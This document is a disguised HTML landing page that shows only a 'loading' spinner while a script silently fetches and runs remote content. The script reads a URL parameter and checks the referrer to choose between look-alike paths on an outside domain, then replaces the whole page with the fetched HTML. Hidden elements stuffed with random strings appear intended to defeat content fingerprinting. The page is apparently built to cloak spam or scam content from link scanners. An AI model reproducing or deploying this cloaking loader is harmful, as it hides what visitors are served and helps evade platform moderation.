<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rq0QOpEhfp3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rq0QOpEhfp3 .etBZeaum3U {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rq0QOpEhfp3 .content {
            line-height: 50px;
            text-align: center
        }

        .rq0QOpEhfp3 .img {
            width: 100%
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK {
            text-align: center
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rq0QOpEhfp3 .ylaaZkwPHQK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rq0QOpEhfp3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GHsyeNbnCZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pbJmQXM = GHsyeNbnCZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pbJmQXM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pbJmQXM +".html?a=share";
		}
		
        uCBmPfp=url+"#"+new Date().getTime();
        uCBmPfp && function() {
            $.get(uCBmPfp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>Nx8HrKgV2Ey1OstvklezpqoTnbuLC7WIvjETAWTiXdcYlWQ1gAZ8FpD5wAmkCw</a>
<b style='display:none' >jEdesEW7LuSqHSX3ebyv5urIR6y3jnhl0Fut4fmLl0j3phz7ZotCEcg7kzFLKKcHqfbEWSHrmVpBKxqn0</b>
<img  src='' style='display:none'><div class="rq0QOpEhfp3">
    <div class="etBZeaum3U">
        <div class="ylaaZkwPHQK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ZIhCzLKWzXK6Pg1woGDGxewUrHS3cSDYFfhs7FewkbSzpWorOHR0mkU56xnMhE57yCXtJ9oSiZimC5IaEuNlVhiotsCUt</a>
<p  style='display:none'>T4hWqiT0FSWQ4etFJ9GLxl6L7wYh1c9JZFyRIVHoG5Ys1f2C97NDaQzfh3Y2mqulrmdqM9bt5zYa1tMQRzfZicEizy4g</p>
<li style='display:none' >FSULETpyytjgLg32MnnYb5X8zWkriXXVTHVbnPkWyE6S1IaCq1VKumicIFcdvVkR9Gpe04IkYlYdeLpW9cXhIDJmiWY72Yot</li>
<img  src='' style='display:none'></body>
</html>